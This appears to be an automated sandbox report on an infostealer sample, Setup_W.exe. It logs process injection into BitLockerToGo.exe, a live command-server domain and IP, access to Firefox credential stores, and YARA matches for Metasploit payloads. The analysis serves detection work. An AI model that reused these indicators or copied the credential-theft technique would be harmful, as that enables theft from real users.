Source: BitLockerToGo.exe, 00000004.00000003.2145451743.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2169738032.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2293687502.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292724484.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292404891.0000000003286000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mooncobudy.click/api7
Source: BitLockerToGo.exe, 00000004.00000002.2293872061.00000000032FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292943982.00000000032FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mooncobudy.click/apiD
Source: BitLockerToGo.exe, 00000004.00000003.2292404891.00000000032E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mooncobudy.click/apiF9tl
Source: BitLockerToGo.exe, 00000004.00000002.2293872061.00000000032FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292943982.00000000032FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mooncobudy.click/apiK
Source: BitLockerToGo.exe, 00000004.00000003.2145451743.0000000003286000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mooncobudy.click/apiO
Source: BitLockerToGo.exe, 00000004.00000003.2063212917.0000000003286000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mooncobudy.click/m
Source: BitLockerToGo.exe, 00000004.00000003.2169738032.0000000003286000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mooncobudy.click/s
Source: BitLockerToGo.exe, 00000004.00000003.2169738032.0000000003286000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mooncobudy.click/s):
Source: BitLockerToGo.exe, 00000004.00000002.2293779528.000000000329A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292724484.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292404891.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2293085450.0000000003299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mooncobudy.click/t
Source: BitLockerToGo.exe, 00000004.00000002.2293687502.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292724484.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2145909317.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063109527.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2169622819.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2145537455.0000000003261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mooncobudy.click:443/api
Source: BitLockerToGo.exe, 00000004.00000002.2293687502.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292724484.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2169622819.0000000003261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mooncobudy.click:443/api2o4p.default-release/key4.dbPK
Source: BitLockerToGo.exe, 00000004.00000002.2293687502.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292724484.0000000003261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mooncobudy.click:443/apiPeYB
Source: BitLockerToGo.exe, 00000004.00000003.2064540383.00000000055B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: BitLockerToGo.exe, 00000004.00000003.2114890767.0000000005679000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: BitLockerToGo.exe, 00000004.00000003.2114890767.0000000005679000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: BitLockerToGo.exe, 00000004.00000003.2091097029.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2064825714.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2090974461.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2064629217.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2064540383.00000000055AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: BitLockerToGo.exe, 00000004.00000003.2064629217.0000000005583000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: BitLockerToGo.exe, 00000004.00000003.2091097029.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2064825714.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2090974461.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2064629217.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2064540383.00000000055AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: BitLockerToGo.exe, 00000004.00000003.2064629217.0000000005583000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: BitLockerToGo.exe, 00000004.00000003.2114890767.0000000005679000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: BitLockerToGo.exe, 00000004.00000003.2114890767.0000000005679000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: BitLockerToGo.exe, 00000004.00000003.2114890767.0000000005679000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: BitLockerToGo.exe, 00000004.00000003.2114890767.0000000005679000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: BitLockerToGo.exe, 00000004.00000003.2114890767.0000000005679000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 104.21.44.57:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.44.57:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.44.57:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.44.57:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.44.57:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.44.57:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.44.57:443 -> 192.168.2.4:49742 version: TLS 1.2

Source: C:\Users\user\Desktop\Setup_W.exe

Code function: 0_2_646053ED glfwGetClipboardString,OpenClipboard,GetClipboardData,CloseClipboard,CloseClipboard,GlobalLock,CloseClipboard,free,GlobalUnlock,CloseClipboard,

0_2_646053ED

Source: C:\Users\user\Desktop\Setup_W.exe

Code function: 0_2_64605394 glfwSetClipboardString,MultiByteToWideChar,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_64605394

Source: C:\Users\user\Desktop\Setup_W.exe

Code function: 0_2_646053ED glfwGetClipboardString,OpenClipboard,GetClipboardData,CloseClipboard,CloseClipboard,GlobalLock,CloseClipboard,free,GlobalUnlock,CloseClipboard,

0_2_646053ED

Source: Setup_W.exe

Binary or memory string: PFN_DirectInput8Create

Source: C:\Users\user\Desktop\Setup_W.exe

Windows user hook set: 0 mouse low level C:\Windows\SYSTEM32\dinput8.dll

Jump to behavior

Source: C:\Users\user\Desktop\Setup_W.exe

Code function: 0_2_6460BA76 RegisterRawInputDevices,

0_2_6460BA76

Source: C:\Users\user\Desktop\Setup_W.exe

Code function: 0_2_6460B019 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,

0_2_6460B019

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2014689557.000000000A100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_032E217A	4_3_032E217A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_032E217A	4_3_032E217A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_032E1652	4_3_032E1652
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_032E1652	4_3_032E1652
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_03296A29	4_3_03296A29
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_03296A29	4_3_03296A29
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_0329686F	4_3_0329686F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_0329686F	4_3_0329686F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_0328E752	4_3_0328E752
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_0328E752	4_3_0328E752
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_03296A29	4_3_03296A29
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_03296A29	4_3_03296A29
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_0329686F	4_3_0329686F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_0329686F	4_3_0329686F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_0328E752	4_3_0328E752
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_0328E752	4_3_0328E752
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_032E217A	4_3_032E217A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_032E217A	4_3_032E217A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_032E1652	4_3_032E1652
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_032E1652	4_3_032E1652
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_03296A29	4_3_03296A29
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_03296A29	4_3_03296A29
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_0329686F	4_3_0329686F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_0329686F	4_3_0329686F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_0328E752	4_3_0328E752
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_0328E752	4_3_0328E752

Source: glfw.4281411633.dll.0.dr

Static PE information: Number of sections : 17 > 10

Source: Setup_W.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED

Source: 00000000.00000002.2014689557.000000000A100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@1/1

Source: C:\Users\user\Desktop\Setup_W.exe

Code function: 0_2_64608298 LoadImageW,GetLastError,FormatMessageW,WideCharToMultiByte,

0_2_64608298

Source: C:\Users\user\Desktop\Setup_W.exe

File created: C:\Users\user\AppData\Local\Temp\glfw.4281411633.dll

Jump to behavior

Source: Setup_W.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Setup_W.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: BitLockerToGo.exe, 00000004.00000003.2064710626.0000000005555000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Setup_W.exe	Virustotal: Detection: 64%
Source: Setup_W.exe	ReversingLabs: Detection: 47%

Source: Setup_W.exe	String found in binary or memory: net/addrselect.go
Source: Setup_W.exe	String found in binary or memory: github.com/hajimehoshi/ebiten@v1.12.12/internal/glfw/load_windows.go

Source: C:\Users\user\Desktop\Setup_W.exe

File read: C:\Users\user\Desktop\Setup_W.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Setup_W.exe "C:\Users\user\Desktop\Setup_W.exe"
Source: C:\Users\user\Desktop\Setup_W.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Desktop\Setup_W.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Setup_W.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup_W.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup_W.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup_W.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup_W.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup_W.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup_W.exe	Section loaded: dinput8.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup_W.exe	Section loaded: xinput1_4.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup_W.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup_W.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup_W.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup_W.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup_W.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup_W.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup_W.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup_W.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup_W.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup_W.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup_W.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup_W.exe	Section loaded: hid.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup_W.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\Setup_W.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25E609E4-B259-11CF-BFC7-444553540000}\InProcServer32

Jump to behavior

Source: Setup_W.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Setup_W.exe

Static file information: File size 32077826 > 1048576

Source: Setup_W.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x257000
Source: Setup_W.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x26e200

Source: Setup_W.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Setup_W.exe

0_2_64608848

Source: Setup_W.exe	Static PE information: section name: .symtab
Source: glfw.4281411633.dll.0.dr	Static PE information: section name: /4
Source: glfw.4281411633.dll.0.dr	Static PE information: section name: /19
Source: glfw.4281411633.dll.0.dr	Static PE information: section name: /31
Source: glfw.4281411633.dll.0.dr	Static PE information: section name: /45
Source: glfw.4281411633.dll.0.dr	Static PE information: section name: /57
Source: glfw.4281411633.dll.0.dr	Static PE information: section name: /70
Source: glfw.4281411633.dll.0.dr	Static PE information: section name: /81
Source: glfw.4281411633.dll.0.dr	Static PE information: section name: /92

Source: C:\Users\user\Desktop\Setup_W.exe	Code function: 0_2_64608848 push ecx; mov dword ptr [esp], 64631695h	0_2_64608A19
Source: C:\Users\user\Desktop\Setup_W.exe	Code function: 0_2_64608848 push esi; mov dword ptr [esp], 646316DBh	0_2_64608A75
Source: C:\Users\user\Desktop\Setup_W.exe	Code function: 0_2_64608848 push esi; mov dword ptr [esp], 6463170Eh	0_2_64608AB8
Source: C:\Users\user\Desktop\Setup_W.exe	Code function: 0_2_6460C519 push eax; mov dword ptr [esp], 00003839h	0_2_6460C7F6
Source: C:\Users\user\Desktop\Setup_W.exe	Code function: 0_2_646094CB push ecx; mov dword ptr [esp], eax	0_2_6460969D
Source: C:\Users\user\Desktop\Setup_W.exe	Code function: 0_2_646094CB push edx; mov dword ptr [esp], eax	0_2_6460974A
Source: C:\Users\user\Desktop\Setup_W.exe	Code function: 0_2_6460B169 push ebx; mov dword ptr [esp], esi	0_2_6460B1BB
Source: C:\Users\user\Desktop\Setup_W.exe	Code function: 0_2_6460B26A push ecx; mov dword ptr [esp], eax	0_2_6460B46F
Source: C:\Users\user\Desktop\Setup_W.exe	Code function: 0_2_6460BA29 push edx; mov dword ptr [esp], eax	0_2_6460BA62
Source: C:\Users\user\Desktop\Setup_W.exe	Code function: 0_2_6460DEEC push esi; mov dword ptr [esp], ebx	0_2_6460DF4E
Source: C:\Users\user\Desktop\Setup_W.exe	Code function: 0_2_6460B6B7 push eax; mov dword ptr [esp], 00003839h	0_2_6460B703
Source: C:\Users\user\Desktop\Setup_W.exe	Code function: 0_2_6460737C push esi; mov dword ptr [esp], ebx	0_2_6460755C
Source: C:\Users\user\Desktop\Setup_W.exe	Code function: 0_2_6460737C push ecx; mov dword ptr [esp], ebx	0_2_646076B0
Source: C:\Users\user\Desktop\Setup_W.exe	Code function: 0_2_6460AB26 push eax; mov dword ptr [esp], edi	0_2_6460AB76
Source: C:\Users\user\Desktop\Setup_W.exe	Code function: 0_2_6460AB26 push edx; mov dword ptr [esp], ebx	0_2_6460AB80
Source: C:\Users\user\Desktop\Setup_W.exe	Code function: 0_2_64601B16 push eax; mov dword ptr [esp], ebx	0_2_64601EB5
Source: C:\Users\user\Desktop\Setup_W.exe	Code function: 0_2_6460ABC8 push eax; mov dword ptr [esp], esi	0_2_6460AC76
Source: C:\Users\user\Desktop\Setup_W.exe	Code function: 0_2_64605394 push ecx; mov dword ptr [esp], eax	0_2_6460E36D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_032F208E pushad ; iretd	4_3_032F208F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_032EBF00 pushad ; ret	4_3_032EBF01
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_032F3570 push 0000004Dh; retn 0043h	4_3_032F3572
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_032E2E00 pushad ; retf	4_3_032E2E01
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_032E2E00 pushad ; retf	4_3_032E2E01
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_0328D883 push 780328C9h; retf	4_3_0328D88D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_0328D883 push 780328C9h; retf	4_3_0328D88D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_032DE9D1 push ss; retf	4_3_032DE9D2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_032DE9D1 push ss; retf	4_3_032DE9D2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_032DE9D1 push ss; retf	4_3_032DE9D2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_032DE9D1 push ss; retf	4_3_032DE9D2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_0328D883 push 780328C9h; retf	4_3_0328D88D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_3_0328D883 push 780328C9h; retf	4_3_0328D88D

Source: C:\Users\user\Desktop\Setup_W.exe

File created: C:\Users\user\AppData\Local\Temp\glfw.4281411633.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Setup_W.exe

Code function: 0_2_6460CD2B IsIconic,

0_2_6460CD2B

Source: C:\Users\user\Desktop\Setup_W.exe

0_2_64608848

Source: C:\Users\user\Desktop\Setup_W.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup_W.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
